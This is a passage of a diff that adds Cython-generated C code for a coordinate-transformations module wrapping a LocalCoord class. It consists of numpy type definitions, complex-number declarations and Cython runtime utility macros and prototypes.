+ +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":734 + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t # <<<<<<<<<<<<<< + * #ctypedef npy_int96 int96_t + * #ctypedef npy_int128 int128_t + */ +typedef npy_int64 __pyx_t_5numpy_int64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":738 + * #ctypedef npy_int128 int128_t + * + * ctypedef npy_uint8 uint8_t # <<<<<<<<<<<<<< + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + */ +typedef npy_uint8 __pyx_t_5numpy_uint8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":739 + * + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t # <<<<<<<<<<<<<< + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t + */ +typedef npy_uint16 __pyx_t_5numpy_uint16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":740 + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t # <<<<<<<<<<<<<< + * ctypedef npy_uint64 uint64_t + * #ctypedef npy_uint96 uint96_t + */ +typedef npy_uint32 __pyx_t_5numpy_uint32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":741 + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t # <<<<<<<<<<<<<< + * #ctypedef npy_uint96 uint96_t + * #ctypedef npy_uint128 uint128_t + */ +typedef npy_uint64 __pyx_t_5numpy_uint64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":745 + * #ctypedef npy_uint128 uint128_t + * + * ctypedef npy_float32 float32_t # <<<<<<<<<<<<<< + * ctypedef npy_float64 float64_t + * #ctypedef npy_float80 float80_t + */ +typedef npy_float32 __pyx_t_5numpy_float32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":746 + * + * ctypedef npy_float32 float32_t + * ctypedef npy_float64 float64_t # <<<<<<<<<<<<<< + * #ctypedef npy_float80 float80_t + * #ctypedef npy_float128 float128_t + */ +typedef npy_float64 __pyx_t_5numpy_float64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":755 + * # The int types are mapped a bit surprising -- + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t + */ +typedef npy_long __pyx_t_5numpy_int_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":756 + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong longlong_t + * + */ +typedef npy_longlong __pyx_t_5numpy_long_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":757 + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_ulong uint_t + */ +typedef npy_longlong __pyx_t_5numpy_longlong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":759 + * ctypedef npy_longlong longlong_t + * + * ctypedef npy_ulong uint_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t + */ +typedef npy_ulong __pyx_t_5numpy_uint_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":760 + * + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulonglong_t + * + */ +typedef npy_ulonglong __pyx_t_5numpy_ulong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":761 + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_intp intp_t + */ +typedef npy_ulonglong __pyx_t_5numpy_ulonglong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":763 + * ctypedef npy_ulonglong ulonglong_t + * + * ctypedef npy_intp intp_t # <<<<<<<<<<<<<< + * ctypedef npy_uintp uintp_t + * + */ +typedef npy_intp __pyx_t_5numpy_intp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":764 + * + * ctypedef npy_intp intp_t + * ctypedef npy_uintp uintp_t # <<<<<<<<<<<<<< + * + * ctypedef npy_double float_t + */ +typedef npy_uintp __pyx_t_5numpy_uintp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":766 + * ctypedef npy_uintp uintp_t + * + * ctypedef npy_double float_t # <<<<<<<<<<<<<< + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t + */ +typedef npy_double __pyx_t_5numpy_float_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":767 + * + * ctypedef npy_double float_t + * ctypedef npy_double double_t # <<<<<<<<<<<<<< + * ctypedef npy_longdouble longdouble_t + * + */ +typedef npy_double __pyx_t_5numpy_double_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":768 + * ctypedef npy_double float_t + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cfloat cfloat_t + */ +typedef npy_longdouble __pyx_t_5numpy_longdouble_t; +/* #### Code section: complex_type_declarations ### */ +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< float > __pyx_t_float_complex; + #else + typedef float _Complex __pyx_t_float_complex; + #endif +#else + typedef struct { float real, imag; } __pyx_t_float_complex; +#endif +static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float, float); + +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< double > __pyx_t_double_complex; + #else + typedef double _Complex __pyx_t_double_complex; + #endif +#else + typedef struct { double real, imag; } __pyx_t_double_complex; +#endif +static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double, double); + +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_6common_15transformations_15transformations_LocalCoord; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":770 + * ctypedef npy_longdouble longdouble_t + * + * ctypedef npy_cfloat cfloat_t # <<<<<<<<<<<<<< + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t + */ +typedef npy_cfloat __pyx_t_5numpy_cfloat_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":771 + * + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t # <<<<<<<<<<<<<< + * ctypedef npy_clongdouble clongdouble_t + * + */ +typedef npy_cdouble __pyx_t_5numpy_cdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":772 + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cdouble complex_t + */ +typedef npy_clongdouble __pyx_t_5numpy_clongdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":774 + * ctypedef npy_clongdouble clongdouble_t + * + * ctypedef npy_cdouble complex_t # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew1(a): + */ +typedef npy_cdouble __pyx_t_5numpy_complex_t; + +/* "common/transformations/transformations.pyx":115 + * + * + * cdef class LocalCoord: # <<<<<<<<<<<<<< + * cdef LocalCoord_c * lc + * + */ +struct __pyx_obj_6common_15transformations_15transformations_LocalCoord { + PyObject_HEAD + LocalCoord *lc; +}; + +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* GetTopmostException.proto */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); +#endif + +/* SaveResetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +#else +#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) +#define __Pyx_ExceptionReset(type, value, tb) PyErr_SetExcInfo(type, value, tb) +#endif + +/* GetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* ExtTypeTest.proto */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type); + +/* IsLittleEndian.proto */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void); + +/* BufferFormatCheck.proto */ +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts); +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type); + +/* BufferGetAndValidate.proto */ +#define __Pyx_GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)\ + ((obj == Py_None || obj == NULL) ?\ + (__Pyx_ZeroBuffer(buf), 0) :\ + __Pyx__GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)) +static int __Pyx__GetBufferAndValidate(Py_buffer* buf, PyObject* obj, + __Pyx_TypeInfo* dtype, int flags, int nd, int cast, __Pyx_BufFmt_StackElem* stack); +static void __Pyx_ZeroBuffer(Py_buffer* buf); +static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info); +static Py_ssize_t __Pyx_minusones[] = { -1, -1, -1, -1, -1, -1, -1, -1 }; +static Py_ssize_t __Pyx_zeros[] = { 0, 0, 0, 0, 0, 0, 0, 0 }; + +/* AssertionsEnabled.proto */ +#define __Pyx_init_assertions_enabled() +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX < 0x02070600 && !defined(Py_OptimizeFlag) + #define __pyx_assertions_enabled() (1) +#elif PY_VERSION_HEX < 0x03080000 || CYTHON_COMPILING_IN_PYPY || defined(Py_LIMITED_API) + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#elif CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030900A6 + static int __pyx_assertions_enabled_flag; + #define __pyx_assertions_enabled() (__pyx_assertions_enabled_flag) + #undef __Pyx_init_assertions_enabled + static void __Pyx_init_assertions_enabled(void) { + __pyx_assertions_enabled_flag = ! _PyInterpreterState_GetConfig(__Pyx_PyThreadState_Current->interp)->optimization_level; + } +#else + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#endif + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* 